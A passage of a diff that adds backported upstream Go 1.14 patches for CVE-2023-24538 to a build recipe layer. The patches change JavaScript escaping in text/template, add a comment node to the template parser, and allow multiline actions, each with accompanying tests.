++ {`<html>`, `\u003Chtml\u003E`},
++ {`no = in attributes`, `no \u003D in attributes`},
++ {`&#x27; does not become HTML entity`, `\u0026#x27; does not become HTML entity`},
+ }
+ for _, tc := range testCases {
+ s := JSEscapeString(tc.in)
+diff --git a/src/text/template/funcs.go b/src/text/template/funcs.go
+index 46125bc..f3de9fb 100644
+--- a/src/text/template/funcs.go
++++ b/src/text/template/funcs.go
+@@ -640,10 +640,10 @@ var (
+ jsBackslash = []byte(`\\`)
+ jsApos = []byte(`\'`)
+ jsQuot = []byte(`\"`)
+- jsLt = []byte(`\x3C`)
+- jsGt = []byte(`\x3E`)
+- jsAmp = []byte(`\x26`)
+- jsEq = []byte(`\x3D`)
++ jsLt = []byte(`\u003C`)
++ jsGt = []byte(`\u003E`)
++ jsAmp = []byte(`\u0026`)
++ jsEq = []byte(`\u003D`)
+ )
+
+ // JSEscape writes to w the escaped JavaScript equivalent of the plain text data b.
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
new file mode 100644
index 0000000000..cd7dd0957c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
@@ -0,0 +1,393 @@
+From 7ddce23c7d5b728acf8482f5006497c7b9915f8a Mon Sep 17 00:00:00 2001
+From: Ariel Mashraki <ariel@mashraki.co.il>
+Date: Wed, 22 Apr 2020 22:17:56 +0300
+Subject: [PATCH 3/6] text/template: add CommentNode to template parse tree
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Fixes #34652
+
+Change-Id: Icf6e3eda593fed826736f34f95a9d66f5450cc98
+Reviewed-on: https://go-review.googlesource.com/c/go/+/229398
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #3
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/c8ea03828b0645b1fd5725888e44873b75fcfbb6
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ api/next.txt | 19 +++++++++++++++++++
+ src/html/template/escape.go | 2 ++
+ src/html/template/template_test.go | 16 ++++++++++++++++
+ src/text/template/exec.go | 1 +
+ src/text/template/parse/lex.go | 8 +++++++-
+ src/text/template/parse/lex_test.go | 7 +++++--
+ src/text/template/parse/node.go | 33 +++++++++++++++++++++++++++++++++
+ src/text/template/parse/parse.go | 22 +++++++++++++++++++---
+ src/text/template/parse/parse_test.go | 25 +++++++++++++++++++++++++
+ 9 files changed, 127 insertions(+), 6 deletions(-)
+
+diff --git a/api/next.txt b/api/next.txt
+index e69de29..076f39e 100644
+--- a/api/next.txt
++++ b/api/next.txt
+@@ -0,0 +1,19 @@
++pkg unicode, const Version = "13.0.0"
++pkg unicode, var Chorasmian *RangeTable
++pkg unicode, var Dives_Akuru *RangeTable
++pkg unicode, var Khitan_Small_Script *RangeTable
++pkg unicode, var Yezidi *RangeTable
++pkg text/template/parse, const NodeComment = 20
++pkg text/template/parse, const NodeComment NodeType
++pkg text/template/parse, const ParseComments = 1
++pkg text/template/parse, const ParseComments Mode
++pkg text/template/parse, method (*CommentNode) Copy() Node
++pkg text/template/parse, method (*CommentNode) String() string
++pkg text/template/parse, method (CommentNode) Position() Pos
++pkg text/template/parse, method (CommentNode) Type() NodeType
++pkg text/template/parse, type CommentNode struct
++pkg text/template/parse, type CommentNode struct, Text string
++pkg text/template/parse, type CommentNode struct, embedded NodeType
++pkg text/template/parse, type CommentNode struct, embedded Pos
++pkg text/template/parse, type Mode uint
++pkg text/template/parse, type Tree struct, Mode Mode
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..8739735 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -124,6 +124,8 @@ func (e *escaper) escape(c context, n parse.Node) context {
+ switch n := n.(type) {
+ case *parse.ActionNode:
+ return e.escapeAction(c, n)
++ case *parse.CommentNode:
++ return c
+ case *parse.IfNode:
+ return e.escapeBranch(c, &n.BranchNode, "if")
+ case *parse.ListNode:
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 86bd4db..1f2c888 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -10,6 +10,7 @@ import (
+ . "html/template"
+ "strings"
+ "testing"
++ "text/template/parse"
+ )
+
+ func TestTemplateClone(t *testing.T) {
+@@ -160,6 +161,21 @@ func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
+ }
+ }
+
++func TestSkipEscapeComments(t *testing.T) {
++ c := newTestCase(t)
++ tr := parse.New("root")
++ tr.Mode = parse.ParseComments
++ newT, err := tr.Parse("{{/* A comment */}}{{ 1 }}{{/* Another comment */}}", "", "", make(map[string]*parse.Tree))
++ if err != nil {
++ t.Fatalf("Cannot parse template text: %v", err)
++ }
++ c.root, err = c.root.AddParseTree("root", newT)
++ if err != nil {
++ t.Fatalf("Cannot add parse tree to template: %v", err)
++ }
++ c.mustExecute(c.root, nil, "1")
++}
++
+ type testCase struct {
+ t *testing.T
+ root *Template
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index ac3e741..7ac5175 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -256,6 +256,7 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+ if len(node.Pipe.Decl) == 0 {
+ s.printValue(node, val)
+ }
++ case *parse.CommentNode:
+ case *parse.IfNode:
+ s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+ case *parse.ListNode:
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 30371f2..e41373a 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -41,6 +41,7 @@ const (
+ itemBool // boolean constant
+ itemChar // printable ASCII character; grab bag for comma etc.
+ itemCharConstant // character constant
++ itemComment // comment text
+ itemComplex // complex constant (1+2i); imaginary is just a number
+ itemAssign // equals ('=') introducing an assignment
+ itemDeclare // colon-equals (':=') introducing a declaration
+@@ -112,6 +113,7 @@ type lexer struct {
+ leftDelim string // start of action
+ rightDelim string // end of action
+ trimRightDelim string // end of action with trim marker
++ emitComment bool // emit itemComment tokens.
+ pos Pos // current position in the input
+ start Pos // start position of this item
+ width Pos // width of last rune read from input
+@@ -203,7 +205,7 @@ func (l *lexer) drain() {
+ }
+
+ // lex creates a new scanner for the input string.
+-func lex(name, input, left, right string) *lexer {
++func lex(name, input, left, right string, emitComment bool) *lexer {
+ if left == "" {
+ left = leftDelim
+ }
+@@ -216,6 +218,7 @@ func lex(name, input, left, right string) *lexer {
+ leftDelim: left,
+ rightDelim: right,
+ trimRightDelim: rightTrimMarker + right,
++ emitComment: emitComment,
+ items: make(chan item),
+ line: 1,
+ startLine: 1,
+@@ -323,6 +326,9 @@ func lexComment(l *lexer) stateFn {
+ if !delim {
+ return l.errorf("comment ends before closing delimiter")
+ }
++ if l.emitComment {
++ l.emit(itemComment)
++ }
+ if trimSpace {
+ l.pos += trimMarkerLen
+ }
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 563c4fc..f6d5f28 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -15,6 +15,7 @@ var itemName = map[itemType]string{
+ itemBool: "bool",
+ itemChar: "char",
+ itemCharConstant: "charconst",
++ itemComment: "comment",
+ itemComplex: "complex",
+ itemDeclare: ":=",
+ itemEOF: "EOF",
+@@ -90,6 +91,7 @@ var lexTests = []lexTest{
+ {"text", `now is the time`, []item{mkItem(itemText, "now is the time"), tEOF}},
+ {"text with comment", "hello-{{/* this is a comment */}}-world", []item{
+ mkItem(itemText, "hello-"),
++ mkItem(itemComment, "/* this is a comment */"),
+ mkItem(itemText, "-world"),
+ tEOF,
+ }},
+@@ -311,6 +313,7 @@ var lexTests = []lexTest{
+ }},
+ {"trimming spaces before and after comment", "hello- {{- /* hello */ -}} -world", []item{
+ mkItem(itemText, "hello-"),
++ mkItem(itemComment, "/* hello */"),
+ mkItem(itemText, "-world"),
+ tEOF,
+ }},
+@@ -389,7 +392,7 @@ var lexTests = []lexTest{
+
+ // collect gathers the emitted items into a slice.
+ func collect(t *lexTest, left, right string) (items []item) {
+- l := lex(t.name, t.input, left, right)
++ l := lex(t.name, t.input, left, right, true)
+ for {
+ item := l.nextItem()
+ items = append(items, item)
+@@ -529,7 +532,7 @@ func TestPos(t *testing.T) {
+ func TestShutdown(t *testing.T) {
+ // We need to duplicate template.Parse here to hold on to the lexer.
+ const text = "erroneous{{define}}{{else}}1234"
+- lexer := lex("foo", text, "{{", "}}")
++ lexer := lex("foo", text, "{{", "}}", false)
+ _, err := New("root").parseLexer(lexer)
+ if err == nil {
+ t.Fatalf("expected error")
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index 1c116ea..a9dad5e 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -70,6 +70,7 @@ const (
+ NodeTemplate // A template invocation action.
+ NodeVariable // A $ variable.
+ NodeWith // A with action.
++ NodeComment // A comment.
+ )
+
+ // Nodes.
+@@ -149,6 +150,38 @@ func (t *TextNode) Copy() Node {
+ return &TextNode{tr: t.tr, NodeType: NodeText, Pos: t.Pos, Text: append([]byte{}, t.Text...)}
+ }
+
++// CommentNode holds a comment.
++type CommentNode struct {
++ NodeType
++ Pos
++ tr *Tree
++ Text string // Comment text.
++}
++
++func (t *Tree) newComment(pos Pos, text string) *CommentNode {
++ return &CommentNode{tr: t, NodeType: NodeComment, Pos: pos, Text: text}
++}
++
++func (c *CommentNode) String() string {
++ var sb strings.Builder
++ c.writeTo(&sb)
++ return sb.String()
++}
++
++func (c *CommentNode) writeTo(sb *strings.Builder) {
++ sb.WriteString("{{")
++ sb.WriteString(c.Text)
++ sb.WriteString("}}")
++}
++
++func (c *CommentNode) tree() *Tree {
++ return c.tr
++}
++
++func (c *CommentNode) Copy() Node {
++ return &CommentNode{tr: c.tr, NodeType: NodeComment, Pos: c.Pos, Text: c.Text}
++}
++
+ // PipeNode holds a pipeline with optional declaration
+ type PipeNode struct {
+ NodeType
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index c9b80f4..496d8bf 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -21,6 +21,7 @@ type Tree struct {
+ Name string // name of the template represented by the tree.
+ ParseName string // name of the top-level template during parsing, for error messages.
+ Root *ListNode // top-level root of the tree.
++ Mode Mode // parsing mode.
+ text string // text parsed to create the template (or its parent)
+ // Parsing only; cleared after parse.
+ funcs []map[string]interface{}
+@@ -29,8 +30,16 @@ type Tree struct {
+ peekCount int
+ vars []string // variables defined at the moment.
+ treeSet map[string]*Tree
++ mode Mode
+ }
+
++// A mode value is a set of flags (or 0). Modes control parser behavior.
++type Mode uint
++
++const (
++ ParseComments Mode = 1 << iota // parse comments and add them to AST
++)
++
+ // Copy returns a copy of the Tree. Any parsing state is discarded.
+ func (t *Tree) Copy() *Tree {
+ if t == nil {
+@@ -220,7 +229,8 @@ func (t *Tree) stopParse() {
+ func (t *Tree) Parse(text, leftDelim, rightDelim string, treeSet map[string]*Tree, funcs ...map[string]interface{}) (tree *Tree, err error) {
+ defer t.recover(&err)
+ t.ParseName = t.Name
+- t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim), treeSet)
++ emitComment := t.Mode&ParseComments != 0
++ t.startParse(funcs, lex(t.Name, text, leftDelim, rightDelim, emitComment), treeSet)
+ t.text = text
+ t.parse()
+ t.add()
+@@ -240,12 +250,14 @@ func (t *Tree) add() {
+ }
+ }
+
+-// IsEmptyTree reports whether this tree (node) is empty of everything but space.
++// IsEmptyTree reports whether this tree (node) is empty of everything but space or comments.
+ func IsEmptyTree(n Node) bool {
+ switch n := n.(type) {
+ case nil:
+ return true
+ case *ActionNode:
++ case *CommentNode:
++ return true
+ case *IfNode:
+ case *ListNode:
+ for _, node := range n.Nodes {
+@@ -276,6 +288,7 @@ func (t *Tree) parse() {
+ if t.nextNonSpace().typ == itemDefine {
+ newT := New("definition") // name will be updated once we know it.
+ newT.text = t.text
++ newT.Mode = t.Mode
+ newT.ParseName = t.ParseName
+ newT.startParse(t.funcs, t.lex, t.treeSet)
+ newT.parseDefinition()
+@@ -331,13 +344,15 @@ func (t *Tree) itemList() (list *ListNode, next Node) {
+ }
+
+ // textOrAction:
+-// text | action
++// text | comment | action
+ func (t *Tree) textOrAction() Node {
+ switch token := t.nextNonSpace(); token.typ {
+ case itemText:
+ return t.newText(token.pos, token.val)
+ case itemLeftDelim:
+ return t.action()
++ case itemComment:
++ return t.newComment(token.pos, token.val)
+ default:
+ t.unexpected(token, "input")
+ }
+@@ -539,6 +554,7 @@ func (t *Tree) blockControl() Node {
+
+ block := New(name) // name will be updated once we know it.
+ block.text = t.text
++ block.Mode = t.Mode
+ block.ParseName = t.ParseName
+ block.startParse(t.funcs, t.lex, t.treeSet)
+ var end Node
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 4e09a78..d9c13c5 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -348,6 +348,30 @@ func TestParseCopy(t *testing.T) {
+ testParse(true, t)
+ }
+
++func TestParseWithComments(t *testing.T) {
++ textFormat = "%q"
++ defer func() { textFormat = "%s" }()
++ tests := [...]parseTest{
++ {"comment", "{{/*\n\n\n*/}}", noError, "{{/*\n\n\n*/}}"},
++ {"comment trim left", "x \r\n\t{{- /* hi */}}", noError, `"x"{{/* hi */}}`},
++ {"comment trim right", "{{/* hi */ -}}\n\n\ty", noError, `{{/* hi */}}"y"`},
++ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x"{{/* */}}"y"`},
++ }
++ for _, test := range tests {
++ t.Run(test.name, func(t *testing.T) {
++ tr := New(test.name)
++ tr.Mode = ParseComments
++ tmpl, err := tr.Parse(test.input, "", "", make(map[string]*Tree))
++ if err != nil {
++ t.Errorf("%q: expected error; got none", test.name)
++ }
++ if result := tmpl.Root.String(); result != test.result {
++ t.Errorf("%s=(%q): got\n\t%v\nexpected\n\t%v", test.name, test.input, result, test.result)
++ }
++ })
++ }
++}
++
+ type isEmptyTest struct {
+ name string
+ input string
+@@ -358,6 +382,7 @@ var isEmptyTests = []isEmptyTest{
+ {"empty", ``, true},
+ {"nonempty", `hello`, false},
+ {"spaces only", " \t\n \t\n", true},
++ {"comment only", "{{/* comment */}}", true},
+ {"definition", `{{define "x"}}something{{end}}`, true},
+ {"definitions and space", "{{define `x`}}something{{end}}\n\n{{define `y`}}something{{end}}\n\n", true},
+ {"definitions and text", "{{define `x`}}something{{end}}\nx\n{{define `y`}}something{{end}}\ny\n", false},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
new file mode 100644
index 0000000000..d5e2eb6684
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_4.patch
@@ -0,0 +1,497 @@
+From 760d88497091fb5d6d231a18e6f4e06ecb9af9b2 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 10 Sep 2020 18:53:26 -0400
+Subject: [PATCH 4/6] text/template: allow newlines inside action delimiters
+
+This allows multiline constructs like:
+
+ {{"hello" |
+ printf}}
+
+Now that unclosed actions can span multiple lines,
+track and report the start of the action when reporting errors.
+
+Also clean up a few "unexpected <error message>" to be just "<error message>".
+
+Fixes #29770.
+
+Change-Id: I54c6c016029a8328b7902a4b6d85eab713ec3285
+Reviewed-on: https://go-review.googlesource.com/c/go/+/254257
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #4
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9384d34c58099657bb1b133beaf3ff37ada9b017
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/text/template/doc.go | 21 ++++-----
+ src/text/template/exec_test.go | 2 +-
+ src/text/template/parse/lex.go | 84 +++++++++++++++++------------------
+ src/text/template/parse/lex_test.go | 2 +-
+ src/text/template/parse/parse.go | 59 +++++++++++++-----------
+ src/text/template/parse/parse_test.go | 36 ++++++++++++---
+ 6 files changed, 117 insertions(+), 87 deletions(-)
+
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 4b0efd2..7b30294 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -40,16 +40,17 @@ More intricate examples appear below.
+ Text and spaces
+
+ By default, all text between actions is copied verbatim when the template is
+-executed. For example, the string " items are made of " in the example above appears
+-on standard output when the program is run.
+-
+-However, to aid in formatting template source code, if an action's left delimiter
+-(by default "{{") is followed immediately by a minus sign and ASCII space character
+-("{{- "), all trailing white space is trimmed from the immediately preceding text.
+-Similarly, if the right delimiter ("}}") is preceded by a space and minus sign
+-(" -}}"), all leading white space is trimmed from the immediately following text.
+-In these trim markers, the ASCII space must be present; "{{-3}}" parses as an
+-action containing the number -3.
++executed. For example, the string " items are made of " in the example above
++appears on standard output when the program is run.
++
++However, to aid in formatting template source code, if an action's left
++delimiter (by default "{{") is followed immediately by a minus sign and white
++space, all trailing white space is trimmed from the immediately preceding text.
++Similarly, if the right delimiter ("}}") is preceded by white space and a minus
++sign, all leading white space is trimmed from the immediately following text.
++In these trim markers, the white space must be present:
++"{{- 3}}" is like "{{3}}" but trims the immediately preceding text, while
++"{{-3}}" parses as an action containing the number -3.
+
+ For instance, when executing the template whose source is
+
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index b8a809e..3309b33 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -1295,7 +1295,7 @@ func TestUnterminatedStringError(t *testing.T) {
+ t.Fatal("expected error")
+ }
+ str := err.Error()
+- if !strings.Contains(str, "X:3: unexpected unterminated raw quoted string") {
++ if !strings.Contains(str, "X:3: unterminated raw quoted string") {
+ t.Fatalf("unexpected error: %s", str)
+ }
+ }
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index e41373a..6784071 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -92,15 +92,14 @@ const eof = -1
+ // If the action begins "{{- " rather than "{{", then all space/tab/newlines
+ // preceding the action are trimmed; conversely if it ends " -}}" the
+ // leading spaces are trimmed. This is done entirely in the lexer; the
+-// parser never sees it happen. We require an ASCII space to be
+-// present to avoid ambiguity with things like "{{-3}}". It reads
++// parser never sees it happen. We require an ASCII space (' ', \t, \r, \n)
++// to be present to avoid ambiguity with things like "{{-3}}". It reads
+ // better with the space present anyway. For simplicity, only ASCII
+-// space does the job.
++// does the job.
+ const (
+- spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
+- leftTrimMarker = "- " // Attached to left delimiter, trims trailing spaces from preceding text.
+- rightTrimMarker = " -" // Attached to right delimiter, trims leading spaces from following text.
+- trimMarkerLen = Pos(len(leftTrimMarker))
++ spaceChars = " \t\r\n" // These are the space characters defined by Go itself.
++ trimMarker = '-' // Attached to left/right delimiter, trims trailing spaces from preceding/following text.
++ trimMarkerLen = Pos(1 + 1) // marker plus space before or after
+ )
+
+ // stateFn represents the state of the scanner as a function that returns the next state.
+@@ -108,19 +107,18 @@ type stateFn func(*lexer) stateFn
+
+ // lexer holds the state of the scanner.
+ type lexer struct {
+- name string // the name of the input; used only for error reports
+- input string // the string being scanned
+- leftDelim string // start of action
+- rightDelim string // end of action
+- trimRightDelim string // end of action with trim marker
+- emitComment bool // emit itemComment tokens.
+- pos Pos // current position in the input
+- start Pos // start position of this item
+- width Pos // width of last rune read from input
+- items chan item // channel of scanned items
+- parenDepth int // nesting depth of ( ) exprs
+- line int // 1+number of newlines seen
+- startLine int // start line of this item
++ name string // the name of the input; used only for error reports
++ input string // the string being scanned
++ leftDelim string // start of action
++ rightDelim string // end of action
++ emitComment bool // emit itemComment tokens.
++ pos Pos // current position in the input
++ start Pos // start position of this item
++ width Pos // width of last rune read from input
++ items chan item // channel of scanned items
++ parenDepth int // nesting depth of ( ) exprs
++ line int // 1+number of newlines seen
++ startLine int // start line of this item
+ }
+
+ // next returns the next rune in the input.
+@@ -213,15 +211,14 @@ func lex(name, input, left, right string, emitComment bool) *lexer {
+ right = rightDelim
+ }
+ l := &lexer{
+- name: name,
+- input: input,
+- leftDelim: left,
+- rightDelim: right,
+- trimRightDelim: rightTrimMarker + right,
+- emitComment: emitComment,
+- items: make(chan item),
+- line: 1,
+- startLine: 1,
++ name: name,
++ input: input,
++ leftDelim: left,
++ rightDelim: right,
++ emitComment: emitComment,
++ items: make(chan item),
++ line: 1,
++ startLine: 1,
+ }
+ go l.run()
+ return l
+@@ -251,7 +248,7 @@ func lexText(l *lexer) stateFn {
+ ldn := Pos(len(l.leftDelim))
+ l.pos += Pos(x)
+ trimLength := Pos(0)
+- if strings.HasPrefix(l.input[l.pos+ldn:], leftTrimMarker) {
++ if hasLeftTrimMarker(l.input[l.pos+ldn:]) {
+ trimLength = rightTrimLength(l.input[l.start:l.pos])
+ }
+ l.pos -= trimLength
+@@ -280,7 +277,7 @@ func rightTrimLength(s string) Pos {
+
+ // atRightDelim reports whether the lexer is at a right delimiter, possibly preceded by a trim marker.
+ func (l *lexer) atRightDelim() (delim, trimSpaces bool) {
+- if strings.HasPrefix(l.input[l.pos:], l.trimRightDelim) { // With trim marker.
++ if hasRightTrimMarker(l.input[l.pos:]) && strings.HasPrefix(l.input[l.pos+trimMarkerLen:], l.rightDelim) { // With trim marker.
+ return true, true
+ }
+ if strings.HasPrefix(l.input[l.pos:], l.rightDelim) { // Without trim marker.
+@@ -297,7 +294,7 @@ func leftTrimLength(s string) Pos {
+ // lexLeftDelim scans the left delimiter, which is known to be present, possibly with a trim marker.
+ func lexLeftDelim(l *lexer) stateFn {
+ l.pos += Pos(len(l.leftDelim))
+- trimSpace := strings.HasPrefix(l.input[l.pos:], leftTrimMarker)
++ trimSpace := hasLeftTrimMarker(l.input[l.pos:])
+ afterMarker := Pos(0)
+ if trimSpace {
+ afterMarker = trimMarkerLen
+@@ -342,7 +339,7 @@ func lexComment(l *lexer) stateFn {
+
+ // lexRightDelim scans the right delimiter, which is known to be present, possibly with a trim marker.
+ func lexRightDelim(l *lexer) stateFn {
+- trimSpace := strings.HasPrefix(l.input[l.pos:], rightTrimMarker)
++ trimSpace := hasRightTrimMarker(l.input[l.pos:])
+ if trimSpace {
+ l.pos += trimMarkerLen
+ l.ignore()
+@@ -369,7 +366,7 @@ func lexInsideAction(l *lexer) stateFn {
+ return l.errorf("unclosed left paren")
+ }
+ switch r := l.next(); {
+- case r == eof || isEndOfLine(r):
++ case r == eof:
+ return l.errorf("unclosed action")
+ case isSpace(r):
+ l.backup() // Put space back in case we have " -}}".
+@@ -439,7 +436,7 @@ func lexSpace(l *lexer) stateFn {
+ }
+ // Be careful about a trim-marked closing delimiter, which has a minus
+ // after a space. We know there is a space, so check for the '-' that might follow.
+- if strings.HasPrefix(l.input[l.pos-1:], l.trimRightDelim) {
++ if hasRightTrimMarker(l.input[l.pos-1:]) && strings.HasPrefix(l.input[l.pos-1+trimMarkerLen:], l.rightDelim) {
+ l.backup() // Before the space.
+ if numSpaces == 1 {
+ return lexRightDelim // On the delim, so go right to that.
+@@ -526,7 +523,7 @@ func lexFieldOrVariable(l *lexer, typ itemType) stateFn {
+ // day to implement arithmetic.
+ func (l *lexer) atTerminator() bool {
+ r := l.peek()
+- if isSpace(r) || isEndOfLine(r) {
++ if isSpace(r) {
+ return true
+ }
+ switch r {
+@@ -657,15 +654,18 @@ Loop:
+
+ // isSpace reports whether r is a space character.
+ func isSpace(r rune) bool {
+- return r == ' ' || r == '\t'
+-}
+-
+-// isEndOfLine reports whether r is an end-of-line character.
+-func isEndOfLine(r rune) bool {
+- return r == '\r' || r == '\n'
++ return r == ' ' || r == '\t' || r == '\r' || r == '\n'
+ }
+
+ // isAlphaNumeric reports whether r is an alphabetic, digit, or underscore.
+ func isAlphaNumeric(r rune) bool {
+ return r == '_' || unicode.IsLetter(r) || unicode.IsDigit(r)
+ }
++
++func hasLeftTrimMarker(s string) bool {
++ return len(s) >= 2 && s[0] == trimMarker && isSpace(rune(s[1]))
++}
++
++func hasRightTrimMarker(s string) bool {
++ return len(s) >= 2 && isSpace(rune(s[0])) && s[1] == trimMarker
++}
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index f6d5f28..6510eed 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -323,7 +323,7 @@ var lexTests = []lexTest{
+ tLeft,
+ mkItem(itemError, "unrecognized character in action: U+0001"),
+ }},
+- {"unclosed action", "{{\n}}", []item{
++ {"unclosed action", "{{", []item{
+ tLeft,
+ mkItem(itemError, "unclosed action"),
+ }},
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 496d8bf..5e6e512 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -24,13 +24,14 @@ type Tree struct {
+ Mode Mode // parsing mode.
+ text string // text parsed to create the template (or its parent)
+ // Parsing only; cleared after parse.
+- funcs []map[string]interface{}
+- lex *lexer
+- token [3]item // three-token lookahead for parser.
+- peekCount int
+- vars []string // variables defined at the moment.
+- treeSet map[string]*Tree
+- mode Mode
++ funcs []map[string]interface{}
++ lex *lexer
++ token [3]item // three-token lookahead for parser.
++ peekCount int
++ vars []string // variables defined at the moment.
++ treeSet map[string]*Tree
++ actionLine int // line of left delim starting action
++ mode Mode
+ }
+
+ // A mode value is a set of flags (or 0). Modes control parser behavior.
+@@ -187,6 +188,16 @@ func (t *Tree) expectOneOf(expected1, expected2 itemType, context string) item {
+
+ // unexpected complains about the token and terminates processing.
+ func (t *Tree) unexpected(token item, context string) {
++ if token.typ == itemError {
++ extra := ""
++ if t.actionLine != 0 && t.actionLine != token.line {
++ extra = fmt.Sprintf(" in action started at %s:%d", t.ParseName, t.actionLine)
++ if strings.HasSuffix(token.val, " action") {
++ extra = extra[len(" in action"):] // avoid "action in action"
++ }
++ }
++ t.errorf("%s%s", token, extra)
++ }
+ t.errorf("unexpected %s in %s", token, context)
+ }
+
+@@ -350,6 +361,8 @@ func (t *Tree) textOrAction() Node {
+ case itemText:
+ return t.newText(token.pos, token.val)
+ case itemLeftDelim:
++ t.actionLine = token.line
++ defer t.clearActionLine()
+ return t.action()
+ case itemComment:
+ return t.newComment(token.pos, token.val)
+@@ -359,6 +372,10 @@ func (t *Tree) textOrAction() Node {
+ return nil
+ }
+
++func (t *Tree) clearActionLine() {
++ t.actionLine = 0
++}
++
+ // Action:
+ // control
+ // command ("|" command)*
+@@ -384,12 +401,12 @@ func (t *Tree) action() (n Node) {
+ t.backup()
+ token := t.peek()
+ // Do not pop variables; they persist until "end".
+- return t.newAction(token.pos, token.line, t.pipeline("command"))
++ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
+ // Pipeline:
+ // declarations? command ('|' command)*
+-func (t *Tree) pipeline(context string) (pipe *PipeNode) {
++func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+ token := t.peekNonSpace()
+ pipe = t.newPipeline(token.pos, token.line, nil)
+ // Are there declarations or assignments?
+@@ -430,12 +447,9 @@ decls:
+ }
+ for {
+ switch token := t.nextNonSpace(); token.typ {
+- case itemRightDelim, itemRightParen:
++ case end:
+ // At this point, the pipeline is complete
+ t.checkPipeline(pipe, context)
+- if token.typ == itemRightParen {
+- t.backup()
+- }
+ return
+ case itemBool, itemCharConstant, itemComplex, itemDot, itemField, itemIdentifier,
+ itemNumber, itemNil, itemRawString, itemString, itemVariable, itemLeftParen:
+@@ -464,7 +478,7 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+ defer t.popVars(len(t.vars))
+- pipe = t.pipeline(context)
++ pipe = t.pipeline(context, itemRightDelim)
+ var next Node
+ list, next = t.itemList()
+ switch next.Type() {
+@@ -550,7 +564,7 @@ func (t *Tree) blockControl() Node {
+
+ token := t.nextNonSpace()
+ name := t.parseTemplateName(token, context)
+- pipe := t.pipeline(context)
++ pipe := t.pipeline(context, itemRightDelim)
+
+ block := New(name) // name will be updated once we know it.
+ block.text = t.text
+@@ -580,7 +594,7 @@ func (t *Tree) templateControl() Node {
+ if t.nextNonSpace().typ != itemRightDelim {
+ t.backup()
+ // Do not pop variables; they persist until "end".
+- pipe = t.pipeline(context)
++ pipe = t.pipeline(context, itemRightDelim)
+ }
+ return t.newTemplate(token.pos, token.line, name, pipe)
+ }
+@@ -614,13 +628,12 @@ func (t *Tree) command() *CommandNode {
+ switch token := t.next(); token.typ {
+ case itemSpace:
+ continue
+- case itemError:
+- t.errorf("%s", token.val)
+ case itemRightDelim, itemRightParen:
+ t.backup()
+ case itemPipe:
++ // nothing here; break loop below
+ default:
+- t.errorf("unexpected %s in operand", token)
++ t.unexpected(token, "operand")
+ }
+ break
+ }
+@@ -675,8 +688,6 @@ func (t *Tree) operand() Node {
